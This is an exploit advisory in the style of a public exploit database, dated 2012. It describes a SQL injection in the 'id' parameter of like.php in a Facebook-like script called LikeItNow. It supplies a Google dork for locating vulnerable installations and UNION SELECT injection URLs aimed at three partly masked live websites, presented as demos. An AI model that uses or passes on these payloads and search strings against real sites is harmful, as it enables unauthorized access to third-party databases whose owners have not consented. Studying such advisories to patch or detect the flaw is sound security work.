# Exploit Title: LikeItNow fb like (like.php, id parameter) SQL Injection
# Date: 17.11.2012
# Author: xStarCode
# Exploit Author: xStarCode
# Version: 1.0
# Category: webapps
# Google Dork: intitle:"LikeItNow - What do you like?"
# Tested on: Linux
# Demo site:
http://cXXmaidea.com/like/like.php?id=-1+UNION+SELECT+1,version(),3--
http://wwwXXercs.net/fb/like.php?id=-1+UNION+SELECT+1,version(),3--
http://maXXio.comule.com/like.php?id=-1+UNION+SELECT+1,version(),3--
# Vulnerable Parameters: id
#Exploit: www.example.com/like.php?id=[SQL Injection]
#
Author Mail: xstarcode@vpn.st
Author Website: www.xstarcode.wordpress.com
Xo xStarCode
#